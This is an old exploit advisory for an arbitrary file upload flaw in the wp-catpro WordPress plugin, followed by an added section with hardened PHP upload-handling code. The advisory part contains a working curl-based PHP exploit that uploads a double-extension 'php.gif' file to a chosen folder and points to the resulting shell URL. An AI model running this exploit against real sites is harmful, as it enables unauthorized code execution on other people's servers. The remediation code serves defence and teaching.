WordPress plugin wp-catpro arbitrary file upload

Posted 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions.
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Upload a PHP payload whose name ends in .gif so it passes the extension whitelist.
$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// The original used the legacy "@file" upload syntax; PHP 5.5+ needs CURLFile, so support both.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => $filedata,
          'folder'   => '/wp-content/uploads/catpro/'));   // destination folder is taken from the request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

Contents of zik.php.gif (the uploaded payload):
<?php
phpinfo();
?>
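The advisory above reduces to two defects: the handler only tests the trailing extension against ("jpg", "gif", "png"), so `shell.php.gif` is accepted, and the destination `folder` is read from the request. The following is an added example, not the plugin's source and not part of the original post: it reconstructs a check of the shape the advisory describes beside a hardened handler that types the upload from its bytes, generates the stored name on the server, and never reads a client-supplied folder. The function names, the magic-number table and the `$_FILES`-style handler are my own assumptions about how such a handler would be written.

```php
<?php
// Added example, not the wp-catpro plugin's code and not from the original post.
// Models the check the advisory describes (trailing extension in jpg/gif/png,
// client-supplied folder) beside a hardened version. Names are assumptions.

const ALLOWED_EXT = ['jpg', 'gif', 'png'];

// Weak check: "shell.php.gif" passes because pathinfo() returns "gif". On an
// Apache + mod_php host using AddHandler, ".php" anywhere in the name can still
// route the file to the PHP engine, which is why the advisory's payload runs.
function weakExtensionCheck(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);
}

// Hardened: decide the type from the uploaded bytes, not from the client name.
function detectImageExtension(string $path): ?string
{
    // Magic numbers for the three types the whitelist allows (constructed table).
    $magic = [
        "\xFF\xD8\xFF"      => 'jpg',
        "GIF87a"            => 'gif',
        "GIF89a"            => 'gif',
        "\x89PNG\r\n\x1A\n" => 'png',
    ];
    $head = @file_get_contents($path, false, null, 0, 8);
    if ($head === false) {
        return null;
    }
    foreach ($magic as $sig => $ext) {
        if (strncmp($head, $sig, strlen($sig)) === 0) {
            return $ext;
        }
    }
    return null;
}

// Server-chosen stored name: random basename plus the detected extension, so a
// client name such as "shell.php.gif" or "../x.php" never reaches the filesystem.
function safeStoredName(string $path): ?string
{
    $ext = detectImageExtension($path);
    return $ext === null ? null : bin2hex(random_bytes(16)) . '.' . $ext;
}

// Hardened handler for one $_FILES entry. $uploadDir is fixed by the server;
// a 'folder' field in the request is simply never read.
function storeUpload(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = safeStoredName($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Stand-alone demo (CLI) with a constructed temp file named like the advisory's payload.
if (PHP_SAPI === 'cli') {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    // GIF signature followed by PHP: a polyglot. A magic-number check alone does not
    // stop it; the forced ".gif" extension plus a no-execute upload directory do.
    file_put_contents($tmp, "GIF89a<?php phpinfo(); ?>");

    var_dump(weakExtensionCheck('shell.php.gif'));  // the weak filter accepts the payload name
    var_dump(safeStoredName($tmp));                 // random basename, extension forced to gif
    var_dump(safeStoredName(__FILE__));             // a real PHP file has no image signature
    unlink($tmp);
}
```

Because a polyglot can carry a valid image header and PHP code in one file, the content check is only a first gate: the controls that actually stop the advisory's shell are that the stored extension is chosen by the server (never `.php`, and never a name with several extensions) and that the web server is configured not to hand anything under the upload directory to the PHP engine. Ignoring the request's `folder` field also closes the path the exploit uses to pick its own destination.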